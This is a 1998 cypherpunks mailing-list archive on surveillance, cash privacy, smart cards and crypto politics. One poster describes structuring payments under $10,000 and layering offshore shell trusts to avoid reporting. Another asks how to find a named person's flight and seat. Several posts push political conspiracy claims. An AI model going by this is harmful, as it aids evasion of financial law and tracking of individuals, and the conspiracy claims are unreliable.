Message-ID: <34D5C79F.A4EA70B@certisign.com.br>
MIME-Version: 1.0
Content-Type: text/plain



Btw, a report from the New Zealand Herald ( 1997-07-21 ) says that
New Zealand's secret facility of Waihopai ( believed to be part of Echelon ) was
being upgraded to be able
to monitor an increasing volume of telecommunications on the Pacific. Even more
interesting is that the NZ's Crimes Act was being modified to allow the interception
of
"private oral communications" ( phone calls ) of foreign states, organizations and
individuals.

The report :  http://www.magnet.ch/serendipity/hermetic/crypto/echelon/nzh1.htm

-vbs

> ...
> I'm much more concerned about the Echelon system which was (finally)
> reported in the Sunday Telegraph just before Xmas.  This system, it is
> alleged, can intercept and look for keywords in ALL international comms
> traffic.  I believe this also gets a mention in the Europarliament report.
>
> Vote early and often for freely available strong encryption!!
> (whatever JR mutters about 'doing him out of his livelihood' :=)  )
> ...
> Key escrow is another example of complete bollocks, IMHO.
> ...








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Cordian <emc@wire.insync.net>
Date: Tue, 3 Feb 1998 02:04:21 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Bush Gang Suspected In Assault On Presidency
In-Reply-To: <3.0.5.32.19980202074638.00875dd0@popd.ix.netcom.com>
Message-ID: <199802021755.LAA17199@wire.insync.net>
MIME-Version: 1.0
Content-Type: text/plain



Bill Stewart writes:

> EIR is one of the mouthpieces for the Lyndon Larouche cult.

We know what EIR is.  While I wouldn't vote Larouche for President, he is
a very bright economist, and the attacks by the Feds on organizations
supporting him clearly demonstrate the lengths the government will go to
silence its critics in our alleged democracy.  I stopped getting "Fusion" 
magazine, to which I was subscribed, when the government seized it.

> I ran across them in an airport recently, and was surprised to find
> they're now strongly behind Bill Clinton; I'd thought that a few years
> ago they were accusing him of being a tool of the Tri-Lateral
> Commission, though perhaps it was some other group of
> anti-TriLateralists. 

Willie ClitorisBum was groomed for a long time for his present position,
by TriLateraloids, and others.  That is not mutually exclusive with the
notion that the conservatives have assisted in the creation of his current
problems. 

Bush is well integrated into America's Secret Aristocracy, and has been a
member of various associated oganizations since his college days.

Interestingly enough, Reagan left Larouche alone when he was questioning
the mental health of Dukakis, but when Larouche became critical of
Reagan's foreign policy, it was quickly arranged for conservative asset
William Weld to take him out with multiple grand juries in dispersed
geographical locations, over small unrepaid campaign loans.

With all the laws the government has, everyone is guilty of something. 

-- 
Eric Michael Cordian 0+
O:.T:.O:. Mathematical Munitions Division
"Do What Thou Wilt Shall Be The Whole Of The Law"





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Information Security <guy@panix.com>
Date: Tue, 3 Feb 1998 01:25:00 +0800
To: cypherpunks@toad.com
Subject: SmartCards in the news
Message-ID: <199802021708.MAA14789@panix2.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



Also see: http://www.zdnet.com/pcweek/news/0112/12bio.html
---guy

   ---------------------------------------------------------------------

   This article is from Internet Computing (http://www.zdnet.com/icom/).
   Visit this page on the Web at:
   http://www.zdnet.com/icom/content/anchors/199802/02/smarten.net/

   ---------------------------------------------------------------------

   [ Features ]

   February 02, 1998
   Smart Cards Smarten the Net

   By Albert Pang

   For many contractors to the U.S. Department of Defense, the Internet
   will become an important ally this year, helping them resolve one of
   the most daunting challenges when doing business with the government:
   Getting paid on time and with a minimal amount of hassle.

   Thanks to a new breed of smart cards backed by sophisticated Web
   applications, 200 defense contractors will start receiving electronic
   checks (e-check) from the government via secure Internet e-mail
   through a pilot program launched in January 1998. 

   The contractors will use their smart cards to access the mail box,
   validate, and endorse the checks. They will then forward the checks to
   BankBoston or NationsBank, the two authorized banks, that will deposit
   them into their accounts.

   The smart cards, which include digital certificates developed by GTE
   Cybertrust, will play a critical role in helping the defense
   department and other agencies comply with a mandate that requires most
   of the 800 million payments the government makes every year be
   converted to electronic form by January 1, 1999. 

   Because of the mandate, the number of smart-card applications in
   different stages of development within the government has doubled to
   more than 900 in the past year, says Jim Hagedorn, a spokesperson for
   the Treasury Department.

   That's good news for vendors such as Anthony Caputo, chairman of
   Information Resource Engineering (IRE) in Baltimore, which develops
   the smart cards and the readers for the e-check program. 

   "It will create a nice revenue stream," Caputo says, adding that his
   company has issued 100,000 smart cards to government and corporate
   customers mostly for use in private networks.

   Now with the Internet, the smart card market could grow
   substantially, especially in Asia and Europe. "Smart cards are the
   ultimate personal network computers," capable of handling everything
   from simple tasks such as identification to complex ones such as
   online banking and electronic commerce, says Philip Yen, senior vice
   president of chip platform at Visa International in Foster City, CA.

   [TABLE NOT SHOWN]

   Both Visa and its rival MasterCard are engaged in smart-card pilots
   around the world, promoting the use of stored-valued chip cards that
   run on private networks or the Internet.

   For example, AT&T Universal Card is working with Mondex, the
   electronic cash venture majority-owned by MasterCard, to sign up a
   small number of online merchants for a pilot program that will allow
   Internet users to buy products from them using smart cards issued by
   AT&T.

   However, analysts expect acceptance of smart cards in the United
   States to be slower than that in other countries because of privacy
   concerns, interoperability issues (Visa and MasterCard use different
   operating systems, for example), and the desire to put as many complex
   applications as possible on a single card.

   Albert Pang is the online editor of the Internet Computing MagaSite
   Send e-mail to apang@zd.com.

   ---------------------------------------------------------------------

   Copyright (c) 1998 ZDNet. All rights reserved. Reproduction in whole
   or in part in any form or medium without express written permission of
   ZDNet is prohibited. ZDNet and the ZDNet logo are trademarks of
   Ziff-Davis Inc.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Tue, 3 Feb 1998 02:57:51 +0800
To: cypherpunks@toad.com
Subject: Re: Bush Gang Suspected In Assault On Presidency
In-Reply-To: <3.0.5.32.19980202074638.00875dd0@popd.ix.netcom.com>
Message-ID: <a5Bake1w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain



Bill Stewart <bill.stewart@pobox.com> writes:

> EIR is one of the mouthpieces for the Lyndon Larouche cult.

The only remaining one that I know of. :-)
I read their mailing list; it's actually interesting. He certainly was
right about predicting the credit problems in the far east and their
spread to Russia.

> I ran across them in an airport recently, and was surprised to find
> they're now strongly behind Bill Clinton; I'd thought that a few

I found this so amusing that I forwarded it to the list.
Yes, LaRouche likes Clinton.

Also laRouche has a math ph.d. as does Ted Kachynzki.  Do you know any
other kookie math PhDs around here?
> years ago they were accusing him of being a tool of the
> Tri-Lateral Commission, though perhaps it was some other group
> of anti-TriLateralists.
> 
> At 10:22 PM 2/1/98 EST, covici@ccs.covici.com wrote:
> >Bush gang suspected in new assault on Presidency
> >
> >by Edward Spannaus and Jeffrey Steinberg
> >
> >In the midst of the worst global financial crisis in modern history, the
> >United States Presidency has come under renewed, vicious attack from a
> >combination of British and nominally ``American'' Bush-League circles.
> ...
> >From Executive Intelligence Review V25, #5.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Tue, 3 Feb 1998 02:05:57 +0800
To: cypherpunks@cyberpass.net
Subject: Airline ticket information -- help
Message-ID: <v03007803b0fbb8956451@[168.161.105.216]>
MIME-Version: 1.0
Content-Type: text/plain



I'm trying to find out what airline flight someone is taking. I have a name
and know the general travel plans and likely date. How can I find out the
airline, flight number, and seat number? This is somewhat urgent. (You have
my assurance that the purpose is legit.)

If anyone has any ideas, I'd appreciate the help.

Thanks,

Declan






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Tue, 3 Feb 1998 03:16:12 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: The Continued Attack on Cash (Was: "The Right of Anonymity"...) (fwd)
Message-ID: <199802021912.NAA29247@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> From: "Attila T. Hun" <attila@hun.org>
> Date: Mon, 02 Feb 98 18:07:57 +0000
> Subject: Re: The Continued Attack on Cash (Was: "The Right of Anonymity"...)

> >I've been doing it for many years. Don't have a checking account, don't
> >own a credit card. I do have a saving account with a local credit union
> >and go in every 3-4 days and withdraw what I need for the next 3-4 days.
> >Pay every bill in cash or money order. 
> 
> first, the use of the credit union includes your SSN and
> they have a total cash transaction at least on your primary
> expenses.

Wrong. I go in once a week and pull out money in a lump sum. I then budget
that money myself. The only thing they have is a sequence of deposits from
paychecks and withdrawals to cash.

>  if you have "consulting" income which can be
> converted to cash, and dont deposit it, then you can do you
> 'high on the hawg' living with the cash --until they bring
> the IRS CID along and look at your 'imputed' income which is
> almost indefensible in their kangaroo courts.

I either take the fees in check and deposit them or else take 'in kind'
trade (eg I did a job if installing Win95 for a customer on some laptops
he'd bought via auction. There was a Tadpole 3XP Sparcbook on there. I took
it for my fee).

> >I'm going to go tomorrow and buy a new laptop at around $1500. 
> 
>     what are you getting for $1500? out here in the boonies 
>     we dont see those kind of prices.

Looks like a Toshiba Satellite 445CTX (133MHz Pentium).

>     well, in the first place, you live in Texas where the
>     attitude to the Feds is rather strong --not as strong as our
>     attitude in rural Utah where the usual transaction is in
>     cash.  out here, a Fed is the same as a revenuer in Eastern
>     Kentucky or Tennessee.  reminds me of the Fed approaching a
>     child and telling him he'd give him $5 if he took him to his
>     father (still) --the boy asked for the money up front. when
>     the Fed asked why, the boy said: "...'cause you aint coming 
>     back".

You don't know Texas or Texans very well...


    ____________________________________________________________________
   |                                                                    |
   |       The most powerful passion in life is not love or hate,       |
   |       but the desire to edit somebody elses words.                 |
   |                                                                    |
   |                                  Sign in Ed Barsis' office         |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jon Cooper <Jon.Cooper@Eng.Sun.COM>
Date: Tue, 3 Feb 1998 06:15:24 +0800
To: cypherpunks@toad.com
Subject: distributed cryptographic attack demo
Message-ID: <libSDtMail.199802021328.23604.cooperj@shoki>
MIME-Version: 1.0
Content-Type: text/plain



hi,

i'm trying to do a demo of a distributed object technology and it seems
to me that many cryptographic attacks would be facilitated by our 
approach.  

do you have any ideas for what a neat distributed effort might be?
the ones i've thought of just don't seem too exciting:

* GNFS of RSA modulus
* attacking SSL
* brute-force RC5 attack

i'm looking for something that would be a sort of viscerally engaging
attack, something that will make people who aren't necessarily 
number theorists or cryptographers take note.

any input would be helpful!

*jon

PS - note that I'm not on cypherpunks so a direct reply would be
most highly appreciated.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jon Cooper <Jon.Cooper@Eng.Sun.COM>
Date: Tue, 3 Feb 1998 06:49:07 +0800
To: cypherpunks@ssz.com
Subject: distributed computing
Message-ID: <libSDtMail.199802021441.6893.cooperj@shoki>
MIME-Version: 1.0
Content-Type: text/plain



I'm in the planning phase of a demo which should demonstrate the power
of a distributed object technology which I'm working with.  Any ideas
for neat crypto-related distributed computation demos would be much
appreciated.

I've thought of:

* brute forcing RC5 (lots of people are doing this already)
* factoring attack on RSA modulus
* Certicom's ECC challenge

But I'm looking for something with more of a sort of gut-level appeal.
Cracking SSL packets might be good.  Hrmm.

thanks for any input ...

*jon





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mix <mixmaster@remail.obscura.com>
Date: Tue, 3 Feb 1998 07:43:38 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199802022253.OAA27023@sirius.infonex.com>
MIME-Version: 1.0
Content-Type: text/plain



subskribe cyferpunks bill@whitehouse.gov







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Tue, 3 Feb 1998 08:51:40 +0800
To: cypherpunks@cyberpass.net
Subject: Re: The Continued Attack on Cash (Was: "The Right of  Anonymity"...)
In-Reply-To: <3.0.3.32.19980202175241.006c95d4@schloss.li>
Message-ID: <v03102807b0fc184de4a7@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



At 3:52 PM -0800 2/2/98, Black Unicorn wrote:
>At 06:07 PM 2/2/98 +0000, Attila T. Hun wrote:
>>    I did-- tried to lay $14K out for a Mercedes (25 years ago).
>>    they wouldnt take it.  so I went and picked up two $7K
>>    cashiers from two different banks.  same thing with a pair
>>    of Lycoming IO540 aircraft engines:  2 8s and a 9 --stay
>>    under the $10K transaction.
>
>Careful.  This may well be illegal now.  Structuring transactions to avoid
>reporting requirements is a felony.
>

Maybe illegal _now_, but Attila didn't say _when_. Further, even our former
prosecutor, Brian, told us that prosecutions are only made when some larger
crime is involved.

(For example, if I made two sub-$10K deposits or withdrawals, and then
later _admitted_ this was to bypass reporting requirements, *BUT* no real
criminal activity or tax evasion was involved, no prosecutor in the land
would bother with something so transparently trivial as this. Unless, of
course, they saw an opportunity to take a thought criminal off the streets.
Which is why I don't describe my financial transactions here.)


>
>(I'm not on cpunks, mail me).

Sorry, if you want to read my words ya gotta subscribe.

--Tim May



The Feds have shown their hand: they want a ban on domestic cryptography
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^2,976,221   | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Marshall Clow <mclow@owl.csusm.edu>
Date: Tue, 3 Feb 1998 09:18:10 +0800
To: Black Unicorn <cypherpunks@cyberpass.net>
Subject: Re: The Continued Attack on Cash (Was: "The Right of  Anonymity"...)
In-Reply-To: <3.0.3.32.19980202175241.006c95d4@schloss.li>
Message-ID: <v04003a01b0fc1931efa7@[130.248.15.47]>
MIME-Version: 1.0
Content-Type: text/plain



At 3:52 PM -0800 2/2/98, Black Unicorn wrote:
>At 06:07 PM 2/2/98 +0000, Attila T. Hun wrote:
>>    I did-- tried to lay $14K out for a Mercedes (25 years ago).
>>    they wouldnt take it.  so I went and picked up two $7K
>>    cashiers from two different banks.  same thing with a pair
>>    of Lycoming IO540 aircraft engines:  2 8s and a 9 --stay
>>    under the $10K transaction.
>
>Careful.  This may well be illegal now.  Structuring transactions to avoid
>reporting requirements is a felony.
>
Some of the reporting requirements have been changed last year
from $10,000 to $750. Check out <http://jya.com/fc052197-3.htm>

>May 21, 1997
>
>SUMMARY: The Financial Crimes Enforcement Network (``FinCEN'') is
>proposing to amend the regulations implementing the Bank Secrecy Act to
>require money transmitters and their agents to report and retain
>records of transactions in currency or monetary instruments of at least
>$750 but not more than $10,000 in connection with the transmission or
>other transfer of funds to any person outside the United States, and to
>verify the identity of senders of such transmissions or transfers. The
>proposed rule is intended to address the misuse of money transmitters
>by money launderers and is in addition to the existing rule requiring
>currency transaction reports for amounts exceeding $10,000.


-- Marshall

Marshall Clow     Adobe Systems   <mailto:mclow@mailhost2.csusm.edu>

Warning: Objects in calendar are closer than they appear.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Tue, 3 Feb 1998 08:14:56 +0800
To: "Attila T. Hun" <attila@primenet.com>
Subject: Re: The Continued Attack on Cash (Was: "The Right of Anonymity"...)
Message-ID: <3.0.3.32.19980202175241.006c95d4@schloss.li>
MIME-Version: 1.0
Content-Type: text/plain



At 06:07 PM 2/2/98 +0000, Attila T. Hun wrote:
>    I did-- tried to lay $14K out for a Mercedes (25 years ago).
>    they wouldnt take it.  so I went and picked up two $7K
>    cashiers from two different banks.  same thing with a pair
>    of Lycoming IO540 aircraft engines:  2 8s and a 9 --stay
>    under the $10K transaction.

Careful.  This may well be illegal now.  Structuring transactions to avoid
reporting requirements is a felony.
  

(I'm not on cpunks, mail me).





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Attila T. Hun" <attila@hun.org>
Date: Tue, 3 Feb 1998 02:09:05 +0800
To: attila@primenet.com>
Subject: RE: Dr Dobbs crypto CD
In-Reply-To: <6B5344C210C7D011835C0000F80127668B1610@exna01.securitydynamics.com>
Message-ID: <19980202.165750.attila@hun.org>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

on or about 980202:0940, in <6B5344C210C7D011835C0000F80127668B1610@exna01.securitydynamics.com>, 
    "Trei, Peter" <ptrei@securitydynamics.com> was purported to have 
    expostulated to perpetuate an opinion:

>I called them up  [...] the impression that I
>was being told that the contractor was apparently
>imcompetant, and could not turn in a usable master in a
>timely fashion.
>
    pure bullshit. that would have been easily enough 
    remedied --get another contractor or invest $3K for top
    of the line equipment (<$1K if you dont mind fiddling)
    and do it yourself. 

    there may be a problem on their part to pay for the
    mastering and the first press run.  if that's the case,
    a few of us should try to acquire their publshing rights
    and get the job over with.

>There was also some mention of the possiblity of 'legal
>difficulties', though I was given no details on that.
>
    1) the creditor lawyers?

    2) more likely the Feds under EAR since there is code
       on the disk and they know full well the mean time
       to export is <60 minutes.

    the first option is solvable as in the contractor 
    problems.  the second option, well...  you know the 
    drill.

    maybe Peter Junger would like to front this and add it 
    to his open ended actions with the Feds?

    whatever...  but let's DO something; anytime I can get
    reference material in a searchable, displayable format,
    I've already got my wallet open.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: latin1
Comment: No safety this side of the grave. Never was; never will be

iQBVAwUBNNYIT7R8UA6T6u61AQH7ngH9FNoXGpeUc3+xMfua6nVekESP1OxGkzRD
8m15vwBEniiW4WYj/2MEYYA5If1EdDfR76w9b2/EQketdCfmOJaHyw==
=sttZ
-----END PGP SIGNATURE-----







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Attila T. Hun" <attila@hun.org>
Date: Tue, 3 Feb 1998 03:03:51 +0800
To: Jim Choate <attila@primenet.com>
Subject: Re: The Continued Attack on Cash (Was: "The Right of Anonymity"...)
In-Reply-To: <199802020709.BAA27402@einstein.ssz.com>
Message-ID: <19980202.180706.attila@hun.org>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

on or about 980202:0109, in <199802020709.BAA27402@einstein.ssz.com>, 
    Jim Choate <ravage@ssz.com> was purported to have 
    expostulated to perpetuate an opinion:

>I've been doing it for many years. Don't have a checking account, don't
>own a credit card. I do have a saving account with a local credit union
>and go in every 3-4 days and withdraw what I need for the next 3-4 days.
>Pay every bill in cash or money order. 

first, the use of the credit union includes your SSN and
they have a total cash transaction at least on your primary
expenses.  if you have "consulting" income which can be
converted to cash, and dont deposit it, then you can do you
'high on the hawg' living with the cash --until they bring
the IRS CID along and look at your 'imputed' income which is
almost indefensible in their kangaroo courts.

secondly, you have not dealt with a federal case where there
is implied evidence as they find a clerk in the usual store
you use...

 [snip]
>I'm going to go tomorrow and buy a new laptop at around $1500. 

    what are you getting for $1500? out here in the boonies 
    we dont see those kind of prices.

>I intend
>on paying with a wad of $100 bills. Bet you they don't look twice nor
>will they ask for ID.

    well, in the first place, you live in Texas where the
    attitude to the Feds is rather strong --not as strong as our
    attitude in rural Utah where the usual transaction is in
    cash.  out here, a Fed is the same as a revenuer in Eastern
    Kentucky or Tennessee.  reminds me of the Fed approaching a
    child and telling him he'd give him $5 if he took him to his
    father (still) --the boy asked for the money up front. when
    the Fed asked why, the boy said: "...'cause you aint coming 
    back".

>I've actualy never had a problem paying cash, never had anyone turn real
>money down...

    I did-- tried to lay $14K out for a Mercedes (25 years ago).
    they wouldnt take it.  so I went and picked up two $7K
    cashiers from two different banks.  same thing with a pair
    of Lycoming IO540 aircraft engines:  2 8s and a 9 --stay
    under the $10K transaction.
    
    of course, if you want to take care of the problem:  use a
    chartered blind "Queens' trust over an Antilles NV, a Dutch
    BV, and an FL AG --of course with a friendly banker who just
    arranges to have the bill paid from a correspondent US bank
    --and who pays your European American Express card for
    you...  need cash under $10K?  use an FL bank card.
    Both the Antilles and Dutch banks are porous, so they
    remain shells paid from the bottom up.
    
    so where is digital cash?  probably the most amusing article
    on digital cash is the Neal Stephenson article:  "The Great
    Simolean Caper" which was in:  Time Mag's Special Issue,
    Spring 1995 Volume 145, No.  12.  yes, it presents "our"
    side of it, but shows the backside and obvious ammo for
    Freeh...  it does not seem to be available on the Time
    server, so anyone who wants to read it:
    
         http://www.primenet.com/~attila/pages/simolean.html

    until we really do have a virtual country and virtual 
    cash, they will always be able to trace it.  As I 
    understand it, the banks keep a record on anything over 
    $1k cash which means there is a master list which can 
    be sorted and filtered. over $10K you must fill out the 
    IRS form; for international you are required to file
    Dept of the Treasury form 515.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: latin1
Comment: No safety this side of the grave. Never was; never will be

iQBVAwUBNNYWmLR8UA6T6u61AQH8+AH9Gr63vhMsfdIXXod5nBpqVzgHDqqWqNq6
sQ7LaI13D2joj9g2crHABfP37G8RnTOekaK4y5CCy1aG0Wa6PgJvDA==
=3nUk
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous Sender <nobody@privacynb.ml.org>
Date: Tue, 3 Feb 1998 06:41:15 +0800
To: cypherpunks@Algebra.COM
Subject: Re: County Mounties Spit on the 4th Amendment
Message-ID: <695e7d4cd89037ab6c4e383c56f8fa6b@privacynb.ml.org>
MIME-Version: 1.0
Content-Type: text/plain



>Oh! The 4th amendment? That dusty old thing? When the scumbags 
>are kicking in your door which would you rather have protecting >you: a raggedy old piece of paper or a Prince George County >Mountie SWAT team in full ninja dress and the latest high-tech >law-enforcement goodies? Thought so. Cup's at the end of the >counter comrade. Have a nice day. 

You couldn't be talking about Prince George, Canada, could you?
"Mounties" are Royal Canadian Mounted Police (RCMP), and are 
limited to Canada, and Disney World.









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Tue, 3 Feb 1998 10:25:53 +0800
To: "James O'Toole" <unicorn@schloss.li>
Subject: RE: The Continued Attack on Cash (Was: "The Right ofAnonymity"...)
In-Reply-To: <01BD301E.4FCC8EC0@slip-james.lcs.mit.edu>
Message-ID: <v03102808b0fc2e66159b@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



At 6:01 PM -0800 2/2/98, James O'Toole wrote:
>Tim,
>
>Maintaining anonymity in the face of the regulatory framework is certain
>to be difficult, and anything difficult is usually rare, expensive, or
>both.

???

>An interesting question about the Privacy Card product is whether the
>social pressure against it is strong enough to defeat its privacy whenever
>the product is well advertised.  In other words, will a privacy product
>survive in spite of its own publicity in our current environment, or can
>privacy products only exist when their own existence is relatively
>unknown.  This is interesting because in the latter case, we have only a
>very very weak form of privacy/anonymity because it is hard to be sure how
>much privacy backs a product whose very existence is semi-secret.

If a Privacy Card is legal, and can be issued by Visa, Mastercard, American
Express, Discover, or some new issuer, and if merchants sign on (as would
presumably be the case by default with Visa and so on), then what is the
"social pressure" you speak of?

Corporate cards are already widely accepted...most of you probably have a
card issued to you through your employing institution. I see no "social
pressure" to block usage of my Institute of Applied Ontology corporate AmEx
card.

The real roadblock is that government makes such privacy-protecting
measures either difficult or illegal.

--Tim May

The Feds have shown their hand: they want a ban on domestic cryptography
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^2,976,221   | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kent Crispin <kent@songbird.com>
Date: Tue, 3 Feb 1998 11:26:37 +0800
To: cypherpunks@cyberpass.net
Subject: Re: The Continued Attack on Cash (Was: "The Right of Anonymity"...)
In-Reply-To: <3.0.3.32.19980202175241.006c95d4@schloss.li>
Message-ID: <19980202191736.02027@songbird.com>
MIME-Version: 1.0
Content-Type: text/plain



On Mon, Feb 02, 1998 at 04:46:19PM -0800, Tim May wrote:
> At 3:52 PM -0800 2/2/98, Black Unicorn wrote:
> >At 06:07 PM 2/2/98 +0000, Attila T. Hun wrote:
> >>    I did-- tried to lay $14K out for a Mercedes (25 years ago).
> >>    they wouldnt take it.  so I went and picked up two $7K
> >>    cashiers from two different banks.  same thing with a pair
> >>    of Lycoming IO540 aircraft engines:  2 8s and a 9 --stay
> >>    under the $10K transaction.
> >
> >Careful.  This may well be illegal now.  Structuring transactions to avoid
> >reporting requirements is a felony.
> >
> 
> Maybe illegal _now_, but Attila didn't say _when_. Further, even our former
> prosecutor, Brian, told us that prosecutions are only made when some larger
> crime is involved.
> 
> (For example, if I made two sub-$10K deposits or withdrawals, and then
> later _admitted_ this was to bypass reporting requirements, *BUT* no real
> criminal activity or tax evasion was involved, no prosecutor in the land
> would bother with something so transparently trivial as this. Unless, of
> course, they saw an opportunity to take a thought criminal off the streets.
> Which is why I don't describe my financial transactions here.)
> 
> 
> >
> >(I'm not on cpunks, mail me).
> 
> Sorry, if you want to read my words ya gotta subscribe.

That's precisely his point,isn't it?

-- 
Kent Crispin				"No reason to get excited",
kent@songbird.com			the thief he kindly spoke...
PGP fingerprint:   B1 8B 72 ED 55 21 5E 44  61 F4 58 0F 72 10 65 55
http://songbird.com/kent/pgp_key.html





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Russell Nelson <nelson@crynwr.com>
Date: Tue, 3 Feb 1998 03:34:01 +0800
To: cypherpunks@toad.com
Subject: whit diffie on national radio
Message-ID: <19980202191942.113.qmail@desk.crynwr.com>
MIME-Version: 1.0
Content-Type: text/plain



FWIW, Whit Diffie is on NPR's Talk of the Nation RIGHT NOW.  Find your
local NPR affiliate, usually in the low end of the dial.

-- 
-russ <nelson@crynwr.com>  http://web.crynwr.com/~nelson
Crynwr Software supports freed software | PGPok |   Freedom is the primary
521 Pleasant Valley Rd. | +1 315 268 1925 voice |   cause of Peace, Love,
Potsdam, NY 13676-3213  | +1 315 268 9201 FAX   |   Truth and Justice.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Tue, 3 Feb 1998 09:32:08 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: INFO-RUSS: Israel Issues Iraq Warning (fwd)
Message-ID: <199802030130.TAA30591@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:
>From INFO-RUSS-request@smarty.ece.jhu.edu Mon Feb  2 19:00:52 1998
Message-Id: <9802022059.AA22808@smarty.ece.jhu.edu>
Errors-To: INFO-RUSS-request@smarty.ece.jhu.edu
Sender: INFO-RUSS-request@smarty.ece.jhu.edu
Date: Sun, 1 Feb 1998 19:32:58 +0200 (IST)
To: info-russ@smarty.ece.jhu.edu
From: info-russ@smarty.ece.jhu.edu
Subject: INFO-RUSS: Israel Issues Iraq Warning


---------------------------------------------------------------------
This is INFO-RUSS broadcast (1200+ subscribers). Home page, information, 
and archives: http://psi.ece.jhu.edu/~kaplan/IRUSS/inforuss.html
To post, or to subscribe/unsubscribe, mail to info-russ@smarty.ece.jhu.edu
INFO-RUSS assumes no responsibility for the information/views of its users.
---------------------------------------------------------------------


Reuters, Sunday February 1 3:34 PM EST

Israel Issues Iraq Warning

JERUSALEM (Reuters) - Prime Minister Benjamin Netanyahu Sunday reserved the
option of retaliating for any Iraqi missile attack on Israel, despite
assurances the United States would step in quickly to punish Iraq.

"The only ones who will make decisions, the only ones who make decisions,
are us and us alone," Netanyahu said in remarks on the Iraq crisis in a
speech to visiting American Jews.

During the 1991 Gulf war, Israel held its fire in the face of 39 Iraqi Scud
missile attacks, bowing to U.S. pressure not to take action that could push
Arab states out of a U.S.-led alliance to drive Iraq out of Kuwait.

On a visit to Israel Sunday, U.S. Secretary of State Madeleine Albright
spoke of a U.S. "iron-clad commitment" to Israel's security and gave notice
any Iraqi threat to countries in the region in the current crisis would not
go unpunished.

"If they do threaten their neighbors or do damage to them our response to it
will be swift and forceful," she said.

But in apparent reply, Netanyahu said in his speech: "One thing has to be
understood -- that we will do whatever is necessary to defend Israel and
strengthen Israel's national security."

He said Israelis should view the Iraqi crisis "calmly because there is a
government here that handles matters professionally and with reason."

Netanyahu spoke after convening cabinet ministers to discuss the possibility
that a U.S. assault on Iraq would push Baghdad to launch missiles against
Israel tipped with biological weapons.

After the session, Deputy Defense Minister Silvan Shalom declined to comment
on the deliberations but he said earlier that Israelis were thronging to
army distribution centers to exchange old gas masks.

Israel's Ha'aretz newspaper reported Sunday the United States had agreed in
principle to send Israel vaccines against anthrax and other biological
agents Iraq is believed to possess.

The newspaper report, attributed to U.S. sources, said Israeli leaders asked
Washington to store hundreds of thousands of doses of the vaccines in
Israel.

Asked if Israel had ordered the vaccines, Defense Minister Yitzhak Mordechai
told reporters:

"Some things are done in coordination between us and the United States to be
able to defend ourselves today and in the future against the possibility
that non-conventional weapons will be possessed by someone who wants to
endanger us."

Israeli officials have said the probability was low that Iraq would launch a
strike but authorities have made clear they are preparing for the worst.

The United States is rallying support from allies for a possible attack on
Iraq to punish President Saddam Hussein for not complying with U.N. arms
inspectors searching for documents and materials related to its weapons
programs.

Iraq says it has no nuclear, chemical or biological weapons or ballistic
missiles -- banned under terms of the cease-fire that ended the Gulf War in
which U.S.-led forces drove Iraqi troops out of Kuwait.
----------------------------------------------------------------------------





